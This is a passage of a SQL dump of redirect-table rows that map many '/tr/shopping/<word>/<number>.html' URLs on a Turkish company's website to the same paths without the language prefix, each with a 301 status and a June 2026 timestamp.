00:00:00',301),(66491,'https://3s-technologies.com.tr/tr/shopping/maginot/784579166.html',NULL,'https://3s-technologies.com.tr/shopping/maginot/784579166.html','',1,0,'2026-06-10 22:12:05','0000-00-00 00:00:00',301),(66492,'https://3s-technologies.com.tr/tr/shopping/graveclothes/3558162966.html',NULL,'https://3s-technologies.com.tr/shopping/graveclothes/3558162966.html','',1,0,'2026-06-10 22:12:08','0000-00-00 00:00:00',301),(66493,'https://3s-technologies.com.tr/tr/shopping/festinate/230947306.html',NULL,'https://3s-technologies.com.tr/shopping/festinate/230947306.html','',1,0,'2026-06-10 22:12:12','0000-00-00 00:00:00',301),(66494,'https://3s-technologies.com.tr/tr/shopping/phytotomist/2904529982.html',NULL,'https://3s-technologies.com.tr/shopping/phytotomist/2904529982.html','',1,0,'2026-06-10 22:12:14','0000-00-00 00:00:00',301),(66495,'https://3s-technologies.com.tr/tr/shopping/uncautiously/2766279938.html',NULL,'https://3s-technologies.com.tr/shopping/uncautiously/2766279938.html','',1,0,'2026-06-10 22:12:22','0000-00-00 00:00:00',301),(66496,'https://3s-technologies.com.tr/tr/shopping/riparian/860031230.html',NULL,'https://3s-technologies.com.tr/shopping/riparian/860031230.html','',1,0,'2026-06-10 22:12:26','0000-00-00 00:00:00',301),(66497,'https://3s-technologies.com.tr/tr/shopping/dogshore/4244455097.html',NULL,'https://3s-technologies.com.tr/shopping/dogshore/4244455097.html','',1,0,'2026-06-10 22:12:29','0000-00-00 00:00:00',301),(66498,'https://3s-technologies.com.tr/tr/shopping/chrysotis/3868463502.html',NULL,'https://3s-technologies.com.tr/shopping/chrysotis/3868463502.html','',1,0,'2026-06-10 22:12:33','0000-00-00 00:00:00',301),(66499,'https://3s-technologies.com.tr/tr/shopping/gambier/1980126320.html',NULL,'https://3s-technologies.com.tr/shopping/gambier/1980126320.html','',1,0,'2026-06-10 22:12:35','0000-00-00 00:00:00',301),(66500,'https://3s-technologies.com.tr/tr/shopping/lifepreserving/662913504.html',NULL,'https://3s-technologies.com.tr/shopping/lifepreserving/662913504.html','',1,0,'2026-06-10 22:12:38','0000-00-00 00:00:00',301),(66501,'https://3s-technologies.com.tr/tr/shopping/guttulata/496827438.html',NULL,'https://3s-technologies.com.tr/shopping/guttulata/496827438.html','',1,0,'2026-06-10 22:12:41','0000-00-00 00:00:00',301),(66502,'https://3s-technologies.com.tr/tr/shopping/stamped/673680886.html',NULL,'https://3s-technologies.com.tr/shopping/stamped/673680886.html','',1,0,'2026-06-10 22:12:44','0000-00-00 00:00:00',301),(66503,'https://3s-technologies.com.tr/tr/shopping/jangler/3484693673.html',NULL,'https://3s-technologies.com.tr/shopping/jangler/3484693673.html','',1,0,'2026-06-10 22:12:47','0000-00-00 00:00:00',301),(66504,'https://3s-technologies.com.tr/tr/shopping/incongruously/2710561702.html',NULL,'https://3s-technologies.com.tr/shopping/incongruously/2710561702.html','',1,0,'2026-06-10 22:12:50','0000-00-00 00:00:00',301),(66505,'https://3s-technologies.com.tr/tr/shopping/mimosaceae/1158286231.html',NULL,'https://3s-technologies.com.tr/shopping/mimosaceae/1158286231.html','',1,0,'2026-06-10 22:12:53','0000-00-00 00:00:00',301),(66506,'https://3s-technologies.com.tr/tr/shopping/transmittance/3590052857.html',NULL,'https://3s-technologies.com.tr/shopping/transmittance/3590052857.html','',1,0,'2026-06-10 22:12:56','0000-00-00 00:00:00',301),(66507,'https://3s-technologies.com.tr/tr/shopping/tensure/2957433238.html',NULL,'https://3s-technologies.com.tr/shopping/tensure/2957433238.html','',1,0,'2026-06-10 22:12:59','0000-00-00 00:00:00',301),(66508,'https://3s-technologies.com.tr/tr/shopping/iodinate/4086917921.html',NULL,'https://3s-technologies.com.tr/shopping/iodinate/4086917921.html','',1,0,'2026-06-10 22:13:02','0000-00-00 00:00:00',301),(66509,'https://3s-technologies.com.tr/tr/shopping/potgun/4165139509.html',NULL,'https://3s-technologies.com.tr/shopping/potgun/4165139509.html','',1,0,'2026-06-10 22:13:08','0000-00-00 00:00:00',301),(66510,'https://3s-technologies.com.tr/tr/shopping/mercurially/2541655435.html',NULL,'https://3s-technologies.com.tr/shopping/mercurially/2541655435.html','',1,0,'2026-06-10 22:13:11','0000-00-00 00:00:00',301),(66511,'https://3s-technologies.com.tr/tr/shopping/meconina/874402544.html',NULL,'https://3s-technologies.com.tr/shopping/meconina/874402544.html','',1,0,'2026-06-10 22:13:14','0000-00-00 00:00:00',301),(66512,'https://3s-technologies.com.tr/tr/shopping/sapajou/1078018152.html',NULL,'https://3s-technologies.com.tr/shopping/sapajou/1078018152.html','',1,0,'2026-06-10 22:13:17','0000-00-00 00:00:00',301),(66513,'https://3s-technologies.com.tr/tr/shopping/siphonostome/3280172211.html',NULL,'https://3s-technologies.com.tr/shopping/siphonostome/3280172211.html','',1,0,'2026-06-10 22:13:20','0000-00-00 00:00:00',301),(66514,'https://3s-technologies.com.tr/tr/shopping/shamble/1466561829.html',NULL,'https://3s-technologies.com.tr/shopping/shamble/1466561829.html','',1,0,'2026-06-10 22:13:29','0000-00-00 00:00:00',301),(66515,'https://3s-technologies.com.tr/tr/shopping/drugget/2340674169.html',NULL,'https://3s-technologies.com.tr/shopping/drugget/2340674169.html','',1,0,'2026-06-10 22:13:32','0000-00-00 00:00:00',301),(66516,'https://3s-technologies.com.tr/tr/shopping/trayfuls/912045699.html',NULL,'https://3s-technologies.com.tr/shopping/trayfuls/912045699.html','',1,0,'2026-06-10 22:13:35','0000-00-00 00:00:00',301),(66517,'https://3s-technologies.com.tr/tr/shopping/sertularian/1418365460.html',NULL,'https://3s-technologies.com.tr/shopping/sertularian/1418365460.html','',1,0,'2026-06-10 22:13:38','0000-00-00 00:00:00',301),(66518,'https://3s-technologies.com.tr/tr/shopping/matrass/1583638719.html',NULL,'https://3s-technologies.com.tr/shopping/matrass/1583638719.html','',1,0,'2026-06-10 22:13:41','0000-00-00 00:00:00',301),(66519,'https://3s-technologies.com.tr/tr/shopping/allergy/3172738195.html',NULL,'https://3s-technologies.com.tr/shopping/allergy/3172738195.html','',1,0,'2026-06-10 22:13:44','0000-00-00 00:00:00',301),(66520,'https://3s-technologies.com.tr/tr/shopping/porthose/829564552.html',NULL,'https://3s-technologies.com.tr/shopping/porthose/829564552.html','',1,0,'2026-06-10 22:13:47','0000-00-00 00:00:00',301),(66521,'https://3s-technologies.com.tr/tr/shopping/tetraxile/3145255273.html',NULL,'https://3s-technologies.com.tr/shopping/tetraxile/3145255273.html','',1,0,'2026-06-10 22:13:50','0000-00-00 00:00:00',301),(66522,'https://3s-technologies.com.tr/tr/shopping/faceharden/1622520043.html',NULL,'https://3s-technologies.com.tr/shopping/faceharden/1622520043.html','',1,0,'2026-06-10 22:13:53','0000-00-00 00:00:00',301),(66523,'https://3s-technologies.com.tr/tr/shopping/profitableness/971354808.html',NULL,'https://3s-technologies.com.tr/shopping/profitableness/971354808.html','',1,0,'2026-06-10 22:13:56','0000-00-00 00:00:00',301),(66524,'https://3s-technologies.com.tr/tr/shopping/micromyx/3105187920.html',NULL,'https://3s-technologies.com.tr/shopping/micromyx/3105187920.html','',1,0,'2026-06-10 22:13:59','0000-00-00 00:00:00',301),(66525,'https://3s-technologies.com.tr/tr/shopping/pearlite/2272235091.html',NULL,'https://3s-technologies.com.tr/shopping/pearlite/2272235091.html','',1,0,'2026-06-10 22:14:03','0000-00-00 00:00:00',301),(66526,'https://3s-technologies.com.tr/tr/shopping/adenopathy/800933235.html',NULL,'https://3s-technologies.com.tr/shopping/adenopathy/800933235.html','',1,0,'2026-06-10 22:14:05','0000-00-00 00:00:00',301),(66527,'https://3s-technologies.com.tr/tr/shopping/jantily/2925425248.html',NULL,'https://3s-technologies.com.tr/shopping/jantily/2925425248.html','',1,0,'2026-06-10 22:14:08','0000-00-00 00:00:00',301),(66528,'https://3s-technologies.com.tr/tr/shopping/ladyinwaiting/3152172190.html',NULL,'https://3s-technologies.com.tr/shopping/ladyinwaiting/3152172190.html','',1,0,'2026-06-10 22:14:13','0000-00-00 00:00:00',301),(66529,'https://3s-technologies.com.tr/tr/shopping/scleranthus/3675847005.html',NULL,'https://3s-technologies.com.tr/shopping/scleranthus/3675847005.html','',1,0,'2026-06-10 22:14:15','0000-00-00 00:00:00',301),(66530,'https://3s-technologies.com.tr/tr/shopping/banker/2587641806.html',NULL,'https://3s-technologies.com.tr/shopping/banker/2587641806.html','',1,0,'2026-06-10 22:14:18','0000-00-00 00:00:00',301),(66531,'https://3s-technologies.com.tr/tr/shopping/throatboll/2190754929.html',NULL,'https://3s-technologies.com.tr/shopping/throatboll/2190754929.html','',1,0,'2026-06-10 22:14:21','0000-00-00 00:00:00',301),(66532,'https://3s-technologies.com.tr/tr/shopping/dictostylium/375932448.html',NULL,'https://3s-technologies.com.tr/shopping/dictostylium/375932448.html','',1,0,'2026-06-10 22:14:24','0000-00-00 00:00:00',301),(66533,'https://3s-technologies.com.tr/tr/shopping/incontestably/329718850.html',NULL,'https://3s-technologies.com.tr/shopping/incontestably/329718850.html','',1,0,'2026-06-10 22:14:27','0000-00-00 00:00:00',301),(66534,'https://3s-technologies.com.tr/tr/shopping/insanitation/626482432.html',NULL,'https://3s-technologies.com.tr/shopping/insanitation/626482432.html','',1,0,'2026-06-10 22:14:30','0000-00-00 00:00:00',301),(66535,'https://3s-technologies.com.tr/tr/shopping/lightshiplimactship/4043473847.html',NULL,'https://3s-technologies.com.tr/shopping/lightshiplimactship/4043473847.html','',1,0,'2026-06-10 22:14:33','0000-00-00 00:00:00',301),(66536,'https://3s-technologies.com.tr/tr/shopping/proxenetism/895902744.html',NULL,'https://3s-technologies.com.tr/shopping/proxenetism/895902744.html','',1,0,'2026-06-10 22:14:36','0000-00-00 00:00:00',301),(66537,'https://3s-technologies.com.tr/tr/shopping/suretiship/3157365912.html',NULL,'https://3s-technologies.com.tr/shopping/suretiship/3157365912.html','',1,0,'2026-06-10 22:14:39','0000-00-00 00:00:00',301),(66538,'https://3s-technologies.com.tr/tr/shopping/erebus/4285474973.html',NULL,'https://3s-technologies.com.tr/shopping/erebus/4285474973.html','',1,0,'2026-06-10 22:14:42','0000-00-00 00:00:00',301),(66539,'https://3s-technologies.com.tr/tr/shopping/realgar/3760941911.html',NULL,'https://3s-technologies.com.tr/shopping/realgar/3760941911.html','',1,0,'2026-06-10 22:14:45','0000-00-00 00:00:00',301),(66540,'https://3s-technologies.com.tr/tr/shopping/nativistic/748148094.html',NULL,'https://3s-technologies.com.tr/shopping/nativistic/748148094.html','',1,0,'2026-06-10 22:14:48','0000-00-00 00:00:00',301),(66541,'https://3s-technologies.com.tr/tr/shopping/ingesta/1983762601.html',NULL,'https://3s-technologies.com.tr/shopping/ingesta/1983762601.html','',1,0,'2026-06-10 22:14:51','0000-00-00 00:00:00',301),(66542,'https://3s-technologies.com.tr/tr/shopping/polaristic/3077932225.html',NULL,'https://3s-technologies.com.tr/shopping/polaristic/3077932225.html','',1,0,'2026-06-10 22:14:56','0000-00-00 00:00:00',301),(66543,'https://3s-technologies.com.tr/tr/shopping/kerosene/913257798.html',NULL,'https://3s-technologies.com.tr/shopping/kerosene/913257798.html','',1,0,'2026-06-10 22:14:58','0000-00-00 00:00:00',301),(66544,'https://3s-technologies.com.tr/tr/shopping/platitudinize/3582876364.html',NULL,'https://3s-technologies.com.tr/shopping/platitudinize/3582876364.html','',1,0,'2026-06-10 22:15:02','0000-00-00 00:00:00',301),(66545,'https://3s-technologies.com.tr/tr/shopping/aventre/1019732996.html',NULL,'https://3s-technologies.com.tr/shopping/aventre/1019732996.html','',1,0,'2026-06-10 22:15:04','0000-00-00 00:00:00',301),(66546,'https://3s-technologies.com.tr/tr/shopping/heterogeny/1615343534.html',NULL,'https://3s-technologies.com.tr/shopping/heterogeny/1615343534.html','',1,0,'2026-06-10 22:15:07','0000-00-00 00:00:00',301),(66547,'https://3s-technologies.com.tr/tr/shopping/caducous/4213335878.html',NULL,'https://3s-technologies.com.tr/shopping/caducous/4213335878.html','',1,0,'2026-06-10 22:15:10','0000-00-00 00:00:00',301),(66548,'https://3s-technologies.com.tr/tr/shopping/bushwhack/1318807179.html',NULL,'https://3s-technologies.com.tr/shopping/bushwhack/1318807179.html','',1,0,'2026-06-10 22:15:14','0000-00-00 00:00:00',301),(66549,'https://3s-technologies.com.tr/tr/shopping/brassey/371180121.html',NULL,'https://3s-technologies.com.tr/shopping/brassey/371180121.html','',1,0,'2026-06-10 22:15:16','0000-00-00 00:00:00',301),(66550,'https://3s-technologies.com.tr/tr/shopping/noisomely/1511336101.html',NULL,'https://3s-technologies.com.tr/shopping/noisomely/1511336101.html','',1,0,'2026-06-10 22:15:20','0000-00-00 00:00:00',301),(66551,'https://3s-technologies.com.tr/tr/shopping/chrysochloridae/3822249904.html',NULL,'https://3s-technologies.com.tr/shopping/chrysochloridae/3822249904.html','',1,0,'2026-06-10 22:15:23','0000-00-00 00:00:00',301),(66552,'https://3s-technologies.com.tr/tr/shopping/adiaphorite/1191340614.html',NULL,'https://3s-technologies.com.tr/shopping/adiaphorite/1191340614.html','',1,0,'2026-06-10 22:15:26','0000-00-00 00:00:00',301),(66553,'https://3s-technologies.com.tr/tr/shopping/incinerated/4024183645.html',NULL,'https://3s-technologies.com.tr/shopping/incinerated/4024183645.html','',1,0,'2026-06-10 22:15:28','0000-00-00 00:00:00',301),(66554,'https://3s-technologies.com.tr/tr/shopping/motograph/3171526112.html',NULL,'https://3s-technologies.com.tr/shopping/motograph/3171526112.html','',1,0,'2026-06-10 22:15:32','0000-00-00 00:00:00',301),(66555,'https://3s-technologies.com.tr/tr/shopping/instrumentist/2123128659.html',NULL,'https://3s-technologies.com.tr/shopping/instrumentist/2123128659.html','',1,0,'2026-06-10 22:15:34','0000-00-00 00:00:00',301),(66556,'https://3s-technologies.com.tr/tr/shopping/subpedunculate/3066166928.html',NULL,'https://3s-technologies.com.tr/shopping/subpedunculate/3066166928.html','',1,0,'2026-06-10 22:15:42','0000-00-00 00:00:00',301),(66557,'https://3s-technologies.com.tr/tr/shopping/homogenetic/3363242211.html',NULL,'https://3s-technologies.com.tr/shopping/homogenetic/3363242211.html','',1,0,'2026-06-10 22:15:44','0000-00-00 00:00:00',301),(66558,'https://3s-technologies.com.tr/tr/shopping/tantra/1226821410.html',NULL,'https://3s-technologies.com.tr/shopping/tantra/1226821410.html','',1,0,'2026-06-10 22:15:47','0000-00-00 00:00:00',301),(66559,'https://3s-technologies.com.tr/tr/shopping/tolsey/2534642449.html',NULL,'https://3s-technologies.com.tr/shopping/tolsey/2534642449.html','',1,0,'2026-06-10 22:15:50','0000-00-00 00:00:00',301),(66560,'https://3s-technologies.com.tr/tr/shopping/quixotic/2454210847.html',NULL,'https://3s-technologies.com.tr/shopping/quixotic/2454210847.html','',1,0,'2026-06-10 22:15:53','0000-00-00 00:00:00',301),(66561,'https://3s-technologies.com.tr/tr/shopping/diarist/2392688670.html',NULL,'https://3s-technologies.com.tr/shopping/diarist/2392688670.html','',1,0,'2026-06-10 22:15:56','0000-00-00 00:00:00',301),(66562,'https://3s-technologies.com.tr/tr/shopping/excrescential/1424329886.html',NULL,'https://3s-technologies.com.tr/shopping/excrescential/1424329886.html','',1,0,'2026-06-10 22:16:00','0000-00-00 00:00:00',301),(66563,'https://3s-technologies.com.tr/tr/shopping/paucispiral/2673056016.html',NULL,'https://3s-technologies.com.tr/shopping/paucispiral/2673056016.html','',1,0,'2026-06-10 22:16:02','0000-00-00 00:00:00',301),(66564,'https://3s-technologies.com.tr/tr/shopping/phalaenidae/40173912.html',NULL,'https://3s-technologies.com.tr/shopping/phalaenidae/40173912.html','',1,0,'2026-06-10 22:16:05','0000-00-00 00:00:00',301),(66565,'https://3s-technologies.com.tr/tr/shopping/tetragrammaton/4215500468.html',NULL,'https://3s-technologies.com.tr/shopping/tetragrammaton/4215500468.html','',1,0,'2026-06-10 22:16:09','0000-00-00 00:00:00',301),(66566,'https://3s-technologies.com.tr/tr/shopping/larviparous/2836979691.html',NULL,'https://3s-technologies.com.tr/shopping/larviparous/2836979691.html','',1,0,'2026-06-10 22:16:13','0000-00-00 00:00:00',301),(66567,'https://3s-technologies.com.tr/tr/shopping/doggishly/3242529056.html',NULL,'https://3s-technologies.com.tr/shopping/doggishly/3242529056.html','',1,0,'2026-06-10 22:16:18','0000-00-00 00:00:00',301),(66568,'https://3s-technologies.com.tr/tr/shopping/quattrocento/2177988647.html',NULL,'https://3s-technologies.com.tr/shopping/quattrocento/2177988647.html','',1,0,'2026-06-10 22:16:20','0000-00-00 00:00:00',301),(66569,'https://3s-technologies.com.tr/tr/shopping/outspoken/1536049499.html',NULL,'https://3s-technologies.com.tr/shopping/outspoken/1536049499.html','',1,0,'2026-06-10 22:16:23','0000-00-00 00:00:00',301),(66570,'https://3s-technologies.com.tr/tr/shopping/circumvolation/1427706575.html',NULL,'https://3s-technologies.com.tr/shopping/circumvolation/1427706575.html','',1,0,'2026-06-10 22:16:30','0000-00-00 00:00:00',301),(66571,'https://3s-technologies.com.tr/tr/shopping/thecosomata/3672470316.html',NULL,'https://3s-technologies.com.tr/shopping/thecosomata/3672470316.html','',1,0,'2026-06-10 22:16:33','0000-00-00 00:00:00',301),(66572,'https://3s-technologies.com.tr/tr/shopping/passionateness/162281001.html',NULL,'https://3s-technologies.com.tr/shopping/passionateness/162281001.html','',1,0,'2026-06-10 22:16:36','0000-00-00 00:00:00',301),(66573,'https://3s-technologies.com.tr/tr/shopping/purulently/2877047044.html',NULL,'https://3s-technologies.com.tr/shopping/purulently/2877047044.html','',1,0,'2026-06-10 22:16:39','0000-00-00 00:00:00',301),(66574,'https://3s-technologies.com.tr/tr/shopping/hypogean/3701165321.html',NULL,'https://3s-technologies.com.tr/shopping/hypogean/3701165321.html','',1,0,'2026-06-10 22:16:42','0000-00-00 00:00:00',301),(66575,'https://3s-technologies.com.tr/tr/shopping/uncial/474278630.html',NULL,'https://3s-technologies.com.tr/shopping/uncial/474278630.html','',1,0,'2026-06-10 22:16:45','0000-00-00 00:00:00',301),(66576,'https://3s-technologies.com.tr/tr/shopping/ethene/3243741139.html',NULL,'https://3s-technologies.com.tr/shopping/ethene/3243741139.html','',1,0,'2026-06-10 22:16:48','0000-00-00 00:00:00',301),(66577,'https://3s-technologies.com.tr/tr/shopping/aviatress/932170293.html',NULL,'https://3s-technologies.com.tr/shopping/aviatress/932170293.html','',1,0,'2026-06-10 22:16:51','0000-00-00 00:00:00',301),(66578,'https://3s-technologies.com.tr/tr/shopping/metagrammatism/870584428.html',NULL,'https://3s-technologies.com.tr/shopping/metagrammatism/870584428.html','',1,0,'2026-06-10 22:16:54','0000-00-00 00:00:00',301),(66579,'https://3s-technologies.com.tr/tr/shopping/disenchant/3407638760.html',NULL,'https://3s-technologies.com.tr/shopping/disenchant/3407638760.html','',1,0,'2026-06-10 22:16:57','0000-00-00 00:00:00',301),(66580,'https://3s-technologies.com.tr/tr/shopping/lascious/867207739.html',NULL,'https://3s-technologies.com.tr/shopping/lascious/867207739.html','',1,0,'2026-06-10 22:17:00','0000-00-00 00:00:00',301),(66581,'https://3s-technologies.com.tr/tr/shopping/loanword/1933912722.html',NULL,'https://3s-technologies.com.tr/shopping/loanword/1933912722.html','',1,0,'2026-06-10 22:17:03','0000-00-00 00:00:00',301),(66582,'https://3s-technologies.com.tr/tr/shopping/moodiness/1518349103.html',NULL,'https://3s-technologies.com.tr/shopping/moodiness/1518349103.html','',1,0,'2026-06-10 22:17:06','0000-00-00 00:00:00',301),(66583,'https://3s-technologies.com.tr/tr/shopping/abraum/1393047128.html',NULL,'https://3s-technologies.com.tr/shopping/abraum/1393047128.html','',1,0,'2026-06-10 22:17:09','0000-00-00 00:00:00',301),(66584,'https://3s-technologies.com.tr/tr/shopping/azoleic/1338931773.html',NULL,'https://3s-technologies.com.tr/shopping/azoleic/1338931773.html','',1,0,'2026-06-10 22:17:15','0000-00-00 00:00:00',301),(66585,'https://3s-technologies.com.tr/tr/shopping/irredentism/2456635029.html',NULL,'https://3s-technologies.com.tr/shopping/irredentism/2456635029.html','',1,0,'2026-06-10 22:17:17','0000-00-00 00:00:00',301),(66586,'https://3s-technologies.com.tr/tr/shopping/tricentenary/4278461971.html',NULL,'https://3s-technologies.com.tr/shopping/tricentenary/4278461971.html','',1,0,'2026-06-10 22:17:20','0000-00-00 00:00:00',301),(66587,'https://3s-technologies.com.tr/tr/shopping/galeoscoptes/2034683118.html',NULL,'https://3s-technologies.com.tr/shopping/galeoscoptes/2034683118.html','',1,0,'2026-06-10 22:17:23','0000-00-00 00:00:00',301),(66588,'https://3s-technologies.com.tr/tr/shopping/farmers/3029735856.html',NULL,'https://3s-technologies.com.tr/shopping/farmers/3029735856.html','',1,0,'2026-06-10 22:17:26','0000-00-00 00:00:00',301),(66589,'https://3s-technologies.com.tr/tr/shopping/gypsine/1211449111.html',NULL,'https://3s-technologies.com.tr/shopping/gypsine/1211449111.html','',1,0,'2026-06-10 22:17:30','0000-00-00 00:00:00',301),(66590,'https://3s-technologies.com.tr/tr/shopping/zifhyr/233371520.html',NULL,'https://3s-technologies.com.tr/shopping/zifhyr/233371520.html','',1,0,'2026-06-10 22:17:32','0000-00-00 00:00:00',301),(66591,'https://3s-technologies.com.tr/tr/shopping/preconizate/2763951825.html',NULL,'https://3s-technologies.com.tr/shopping/preconizate/2763951825.html','',1,0,'2026-06-10 22:17:35','0000-00-00 00:00:00',301),(66592,'https://3s-technologies.com.tr/tr/shopping/circumvest/945265820.html',NULL,'https://3s-technologies.com.tr/shopping/circumvest/945265820.html','',1,0,'2026-06-10 22:17:38','0000-00-00 00:00:00',301),(66593,'https://3s-technologies.com.tr/tr/shopping/revels/3906272395.html',NULL,'https://3s-technologies.com.tr/shopping/revels/3906272395.html','',1,0,'2026-06-10 22:17:41','0000-00-00 00:00:00',301),(66594,'https://3s-technologies.com.tr/tr/shopping/gallygaskins/1106531354.html',NULL,'https://3s-technologies.com.tr/shopping/gallygaskins/1106531354.html','',1,0,'2026-06-10 22:17:44','0000-00-00 00:00:00',301),(66595,'https://3s-technologies.com.tr/tr/shopping/tenosynovitis/3823461987.html',NULL,'https://3s-technologies.com.tr/shopping/tenosynovitis/3823461987.html','',1,0,'2026-06-10 22:17:47','0000-00-00 00:00:00',301),(66596,'https://3s-technologies.com.tr/tr/shopping/rattlepate/2770868710.html',NULL,'https://3s-technologies.com.tr/shopping/rattlepate/2770868710.html','',1,0,'2026-06-10 22:17:50','0000-00-00 00:00:00',301),(66597,'https://3s-technologies.com.tr/tr/shopping/sexcinctus/2835767576.html',NULL,'https://3s-technologies.com.tr/shopping/sexcinctus/2835767576.html','',1,0,'2026-06-10 22:17:54','0000-00-00 00:00:00',301),(66598,'https://3s-technologies.com.tr/tr/shopping/somnambulator/3711718519.html',NULL,'https://3s-technologies.com.tr/shopping/somnambulator/3711718519.html','',1,0,'2026-06-10 22:17:56','0000-00-00 00:00:00',301),(66599,'https://3s-technologies.com.tr/tr/shopping/european/4096863970.html',NULL,'https://3s-technologies.com.tr/shopping/european/4096863970.html','',1,0,'2026-06-10 22:18:00','0000-00-00 00:00:00',301),(66600,'https://3s-technologies.com.tr/tr/shopping/clamjamphrie/1567332241.html',NULL,'https://3s-technologies.com.tr/shopping/clamjamphrie/1567332241.html','',1,0,'2026-06-10 22:18:03','0000-00-00 00:00:00',301),(66601,'https://3s-technologies.com.tr/tr/shopping/scrobiculae/3332186696.html',NULL,'https://3s-technologies.com.tr/shopping/scrobiculae/3332186696.html','',1,0,'2026-06-10 22:18:05','0000-00-00 00:00:00',301),(66602,'https://3s-technologies.com.tr/tr/shopping/fitment/3367830999.html',NULL,'https://3s-technologies.com.tr/shopping/fitment/3367830999.html','',1,0,'2026-06-10 22:18:08','0000-00-00 00:00:00',301),(66603,'https://3s-technologies.com.tr/tr/shopping/leucostegia/1748774493.html',NULL,'https://3s-technologies.com.tr/shopping/leucostegia/1748774493.html','',1,0,'2026-06-10 22:18:12','0000-00-00 00:00:00',301),(66604,'https://3s-technologies.com.tr/tr/shopping/phosphorate/1347274973.html',NULL,'https://3s-technologies.com.tr/shopping/phosphorate/1347274973.html','',1,0,'2026-06-10 22:18:15','0000-00-00 00:00:00',301),(66605,'https://3s-technologies.com.tr/tr/shopping/animalcular/2390524080.html',NULL,'https://3s-technologies.com.tr/shopping/animalcular/2390524080.html','',1,0,'2026-06-10 22:18:17','0000-00-00 00:00:00',301),(66606,'https://3s-technologies.com.tr/tr/shopping/kepviselohaz/2653979998.html',NULL,'https://3s-technologies.com.tr/shopping/kepviselohaz/2653979998.html','',1,0,'2026-06-10 22:18:21','0000-00-00 00:00:00',301),(66607,'https://3s-technologies.com.tr/tr/shopping/apheliotropic/3835409119.html',NULL,'https://3s-technologies.com.tr/shopping/apheliotropic/3835409119.html','',1,0,'2026-06-10 22:18:24','0000-00-00 00:00:00',301),(66608,'https://3s-technologies.com.tr/tr/shopping/claroobscuro/2887782077.html',NULL,'https://3s-technologies.com.tr/shopping/claroobscuro/2887782077.html','',1,0,'2026-06-10 22:18:27','0000-00-00 00:00:00',301),(66609,'https://3s-technologies.com.tr/tr/shopping/tamboura/349072756.html',NULL,'https://3s-technologies.com.tr/shopping/tamboura/349072756.html','',1,0,'2026-06-10 22:18:30','0000-00-00 00:00:00',301),(66610,'https://3s-technologies.com.tr/tr/shopping/apophlegmatism/1496405261.html',NULL,'https://3s-technologies.com.tr/shopping/apophlegmatism/1496405261.html','',1,0,'2026-06-10 22:18:34','0000-00-00 00:00:00',301),(66611,'https://3s-technologies.com.tr/tr/shopping/lechanorales/279357875.html',NULL,'https://3s-technologies.com.tr/shopping/lechanorales/279357875.html','',1,0,'2026-06-10 22:18:39','0000-00-00 00:00:00',301),(66612,'https://3s-technologies.com.tr/tr/shopping/sutlership/96170036.html',NULL,'https://3s-technologies.com.tr/shopping/sutlership/96170036.html','',1,0,'2026-06-10 22:18:42','0000-00-00 00:00:00',301),(66613,'https://3s-technologies.com.tr/tr/shopping/dekabrist/1272593581.html',NULL,'https://3s-technologies.com.tr/shopping/dekabrist/1272593581.html','',1,0,'2026-06-10 22:18:45','0000-00-00 00:00:00',301),(66614,'https://3s-technologies.com.tr/tr/shopping/groyne/1766474873.html',NULL,'https://3s-technologies.com.tr/shopping/groyne/1766474873.html','',1,0,'2026-06-10 22:18:48','0000-00-00 00:00:00',301),(66615,'https://3s-technologies.com.tr/tr/shopping/seneschalship/2492246951.html',NULL,'https://3s-technologies.com.tr/shopping/seneschalship/2492246951.html','',1,0,'2026-06-10 22:18:57','0000-00-00 00:00:00',301),(66616,'https://3s-technologies.com.tr/tr/shopping/banderole/2873410763.html',NULL,'https://3s-technologies.com.tr/shopping/banderole/2873410763.html','',1,0,'2026-06-10 22:19:00','0000-00-00 00:00:00',301),(66617,'https://3s-technologies.com.tr/tr/shopping/trilobed/2728080279.html',NULL,'https://3s-technologies.com.tr/shopping/trilobed/2728080279.html','',1,0,'2026-06-10 22:19:03','0000-00-00 00:00:00',301),(66618,'https://3s-technologies.com.tr/tr/shopping/tenters/1954642250.html',NULL,'https://3s-technologies.com.tr/shopping/tenters/1954642250.html','',1,0,'2026-06-10 22:19:06','0000-00-00 00:00:00',301),(66619,'https://3s-technologies.com.tr/tr/shopping/agelarius/1926995821.html',NULL,'https://3s-technologies.com.tr/shopping/agelarius/1926995821.html','',1,0,'2026-06-10 22:19:09','0000-00-00 00:00:00',301),(66620,'https://3s-technologies.com.tr/tr/shopping/anthropophagy/3875476472.html',NULL,'https://3s-technologies.com.tr/shopping/anthropophagy/3875476472.html','',1,0,'2026-06-10 22:19:12','0000-00-00 00:00:00',301),(66621,'https://3s-technologies.com.tr/tr/shopping/katsuwonidae/1641432522.html',NULL,'https://3s-technologies.com.tr/shopping/katsuwonidae/1641432522.html','',1,0,'2026-06-10 22:19:17','0000-00-00 00:00:00',301),(66622,'https://3s-technologies.com.tr/tr/shopping/haemachrome/1157333756.html',NULL,'https://3s-technologies.com.tr/shopping/haemachrome/1157333756.html','',1,0,'2026-06-10 22:19:21','0000-00-00 00:00:00',301),(66623,'https://3s-technologies.com.tr/tr/shopping/arctocebus/4284262858.html',NULL,'https://3s-technologies.com.tr/shopping/arctocebus/4284262858.html','',1,0,'2026-06-10 22:19:24','0000-00-00 00:00:00',301),(66624,'https://3s-technologies.com.tr/tr/shopping/agatiferous/4247995325.html',NULL,'https://3s-technologies.com.tr/shopping/agatiferous/4247995325.html','',1,0,'2026-06-10 22:19:27','0000-00-00 00:00:00',301),(66625,'https://3s-technologies.com.tr/tr/shopping/tacamahac/1941089231.html',NULL,'https://3s-technologies.com.tr/shopping/tacamahac/1941089231.html','',1,0,'2026-06-10 22:19:33','0000-00-00 00:00:00',301),(66626,'https://3s-technologies.com.tr/tr/shopping/crepusculine/2842944085.html',NULL,'https://3s-technologies.com.tr/shopping/crepusculine/2842944085.html','',1,0,'2026-06-10 22:19:36','0000-00-00 00:00:00',301),(66627,'https://3s-technologies.com.tr/tr/shopping/nonagenarian/3141618992.html',NULL,'https://3s-technologies.com.tr/shopping/nonagenarian/3141618992.html','',1,0,'2026-06-10 22:19:39','0000-00-00 00:00:00',301),(66628,'https://3s-technologies.com.tr/tr/shopping/myriophyllous/486043927.html',NULL,'https://3s-technologies.com.tr/shopping/myriophyllous/486043927.html','',1,0,'2026-06-10 22:19:42','0000-00-00 00:00:00',301),(66629,'https://3s-technologies.com.tr/tr/shopping/curvature/3074392013.html',NULL,'https://3s-technologies.com.tr/shopping/curvature/3074392013.html','',1,0,'2026-06-10 22:19:45','0000-00-00 